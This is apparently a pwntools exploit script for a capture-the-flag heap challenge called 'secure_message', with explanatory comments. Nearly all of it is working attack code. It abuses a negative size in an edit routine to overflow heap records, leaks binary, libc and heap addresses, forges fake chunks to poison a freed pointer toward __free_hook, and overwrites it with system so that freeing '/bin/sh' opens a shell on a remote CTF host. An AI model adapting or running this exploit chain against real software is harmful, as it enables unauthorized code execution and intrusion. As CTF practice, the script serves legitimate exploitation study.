- #!/usr/bin/env python
- from pwn import *
# gdb (options 'd'/'a' below) opens in a horizontal tmux split next to this script.
context.terminal = ['tmux', 'splitw', '-h']  # horizontal split window
# context.terminal = ['tmux', 'new-window']  # open new window
# libc = ELF('./libc-2.27.so')
# Target binary; the architecture for context is taken from its header.
elf = ELF('./secure_message')
context.os = 'linux'
context.arch = elf.arch
# Remote CTF instance versus a local listener on the same port (option 'r' / 'l').
RHOST, RPORT = "178.128.87.12", 31337
LHOST, LPORT = "127.0.0.1", 31337
def section_addr(name, elf=elf):
    """Return the load address (sh_addr) of ELF section *name*.

    elf defaults to the module-level binary, bound at definition time.
    Raises AttributeError if the section is absent (get_section_by_name
    returns None in that case).
    """
    section = elf.get_section_by_name(name)
    header = section.header
    return header['sh_addr']
def dbg(ss):
    """Log the integer value of the expression string *ss* in hex.

    Typical use: dbg('bin_base') logs "bin_base: 0x...".

    *ss* goes through eval() in this function's scope (module globals are
    visible), so it must only ever be a literal written by the exploit
    author -- never anything read back from the target or taken from argv.
    """
    value = eval(ss)  # trusted, author-written expression only
    log.info("%s: 0x%x" % (ss, value))
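conn = None
# The first CLI argument selects the target and is popped so pwntools never
# sees it:  r -> remote CTF box, l -> local listener, d -> run under gdb,
# a -> local process with gdb attached, anything else -> plain local process.
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'  # pop option
if opt in ('r', 'l'):
    # Tuple membership rather than the substring test `opt in 'rl'`, which
    # also accepted '' and 'rl' and then raised KeyError on the dict lookup.
    conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
    # NOTE(review): the template has no '{}' placeholder, so the address
    # computed here never reaches gdb -- a `break *{}` line was presumably
    # dropped at some point. Left as-is to keep behaviour unchanged.
    gdbscript = """
continue
""".format(hex(elf.symbols['main'] if 'main' in elf.symbols else elf.entrypoint))
    conn = gdb.debug(['./secure_message'], gdbscript=gdbscript)
else:
    conn = process(['./secure_message'])
    # conn = process(['./secure_message'], env={'LD_PRELOAD': './libc-2.27.so'})
    if opt == 'a':
        gdb.attach(conn)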
def register(name, password, desc):
    """Drive outer-menu option 1 (register) with its three prompted fields.

    All three values are sent raw with send(), so the caller decides whether
    a trailing newline is included (the call sites mix 'hoge\\n' style
    line-terminated values with fixed-width 'b' * 0x20 ones).
    """
    conn.sendlineafter('Choice: ', '1')
    fields = (
        ('Username:', name),
        ('Password:', password),
        ('Describe your self', desc),
    )
    for prompt, value in fields:
        conn.sendafter(prompt, value)
def login(name, password):
    """Drive outer-menu option 2 (login) and wait for the 'Hello:' banner.

    Credentials are sent raw, exactly like register(); the trailing
    recvuntil consumes the greeting so the next 'Choice: ' prompt is in sync.
    """
    conn.sendlineafter('Choice: ', '2')
    for prompt, value in (('Username:', name), ('Password:', password)):
        conn.sendafter(prompt, value)
    conn.recvuntil('Hello:')
def quit():
    """Select outer-menu option 3 (quit).

    Shadows the builtin quit(); harmless in this script, but the
    interpreter's exit helper is no longer reachable under that name.
    """
    choice = '3'
    conn.sendlineafter('Choice: ', choice)
def add(name, size, content):
    """Inner-menu option 1: create a message *name* of declared *size*, then send *content*.

    name and size are sent as lines in response to prompts; content is sent
    raw after a short pause, presumably because the target prints no prompt
    before reading the body. The sleep is a timing guess, not a protocol
    sync point, so a slow target can still desynchronise here.
    """
    lines = (('Choice: ', '1'), ('Name: ', name), ('Size:', str(size)))
    for prompt, value in lines:
        conn.sendlineafter(prompt, value)
    time.sleep(0.1)
    conn.send(content)
def edit(idx, size, content):
    """Inner-menu option 3: overwrite message *idx* with *size* bytes of *content*.

    size is passed through str() unchanged, so negative values (used by the
    exploit to trigger the oversized write) reach the target verbatim.
    content is sent raw after a short pause; as in add(), the sleep stands
    in for a prompt the target presumably does not print.
    """
    lines = (('Choice: ', '3'), ('edit?', str(idx)), ('Size:', str(size)))
    for prompt, value in lines:
        conn.sendlineafter(prompt, value)
    time.sleep(0.1)
    conn.send(content)
def remove(idx):
    """Inner-menu option 2: delete message *idx* (answered at the '?' prompt)."""
    for prompt, value in (('Choice: ', '2'), ('?', str(idx))):
        conn.sendlineafter(prompt, value)
# ------------------------------------------------------------------ exploit
# Python 2 only: str/bytes are mixed freely and str.decode('hex') is used.
# All subtracted constants below are offsets into one specific binary,
# libc and heap layout (presumably the libc-2.27 build referenced by the
# commented LD_PRELOAD line above); they will not transfer to another build.
log.info('Pwning')


def _send_qwords(*values):
    """Send each value as its own 8-byte little-endian write (one send() per value)."""
    for value in values:
        conn.send(p64(value))


# Four accounts; only the first (newline-terminated credentials) is logged in.
register('hoge\n', 'fuga\n', 'a' * 0x80)
register('b' * 0x20, 'b' * 0x20, 'b' * 0x80)
register('c' * 0x20, 'c' * 0x20, 'c' * 0x80)
register('d' * 0x20, 'd' * 0x20, 'd' * 0x80)
login('hoge\n', 'fuga\n')

# Every add() is followed by extra qwords the target reads after the body;
# what they mean (key, nonce, checksum?) is not recoverable from this script.
MAGIC = 0xc9f68e5b26a07627
add('x' * 0x18, 0xfd0, 'z' * 0xfd0)
_send_qwords(MAGIC, MAGIC, MAGIC)
add('y' * 0x18, 0xfd0, 'w' * 0xfd0)
_send_qwords(MAGIC + 0x1000, MAGIC + 0x1000, MAGIC + 0x1000)
# size -1 is presumably the bug: an unchecked/signed length that lets this
# 0x1f00-byte write run past message 0 into the neighbouring records.
edit(0, -1, 'a' * 0x1f00 + '\n')
add('', 0xff, '\n')
_send_qwords(MAGIC + 0x3000, MAGIC + 0x3000)
conn.send(p64(0) * 4)
# conn.send(p64(0xc9f68e5b26a07627+0x2000))

# Option 4 presumably lists messages; the clobbered record leaks pointers.
conn.sendlineafter('Choice: ', '4')
conn.recvuntil('1 - [yyyyyyyyyyyyyyyyyyyyyyyy')
bin_base = u64(conn.recv(6) + '\x00\x00') - 0x211d
dbg('bin_base')
conn.recvuntil('\n')
# The next leaks arrive hex-encoded: 14 hex digits -> 7 bytes, padded to 8.
libc_base = u64(conn.recv(14).decode('hex') + '\x00') - 0x3ec2b0
dbg('libc_base')
conn.recv(14)  # one field skipped
heap_base = u64(conn.recv(14).decode('hex') + '\x00') - 0x250
dbg('heap_base')

add('aaaaaa', 0x1000, 'b' * 0x1000)
_send_qwords(0xdeadbeef000, 0xdeadbeef000)
conn.send(p64(0) * 4)
add('target', 0x100, 'c' * 0x1000)  # 0x1000 bytes sent for a 0x100 message
_send_qwords(0xdeadbef0000, 0xdeadbef0000)
conn.send(p64(0) * 4)
edit(2, 8192, 'hoge\n')
# Forge a record header (size 0x100, flag 1, data pointer) past 0xfd0 bytes of filler.
forged_header = 'd' * 0xfd0 + p32(0x100) + p32(1) + p64(0xe5b26a08030 + 0x10)
add('aaaaaa', 0x1100, forged_header + '\n')
_send_qwords(0x00000deadbef0000 - 0x1000, 0x00000deadbef0000 - 0x1000)
conn.send(p64(0) * 4)
# Fake chunk pair with 0x31 size fields so that freeing record 2 is accepted.
fake_chunk = p64(0) + p64(0x31) + p64(0) * 5 + p64(0x31)
edit(0, 0x100, fake_chunk + '\n')
remove(2)
# Same fake chunk, but its first user qword now points at libc_base+0x3ed8e8
# so a later same-sized allocation is served from there. 0x3ed8e8 looks like
# __free_hook in the libc-2.27 build named above -- confirm against that libc.
fake_chunk = p64(0) + p64(0x31) + p64(libc_base + 0x3ed8e8) + p64(0) * 4 + p64(0x31)
edit(0, 0x100, fake_chunk + '\n')
add('a', 0xf00, 'hoge\n')
_send_qwords(0xbeefdead000, 0xbeefdead000)
conn.send(p64(0) * 4)
# Second allocation lands on the poisoned pointer; the trailing qword written
# there is libc_base+0x4f440 (presumably system), so freeing '/bin/sh' pops a shell.
add('a', 0xf00, '/bin/sh\x00\n')
_send_qwords(0xbeefdead000, 0xbeefdead000)
conn.send(p64(libc_base + 0x4f440))
conn.interactive()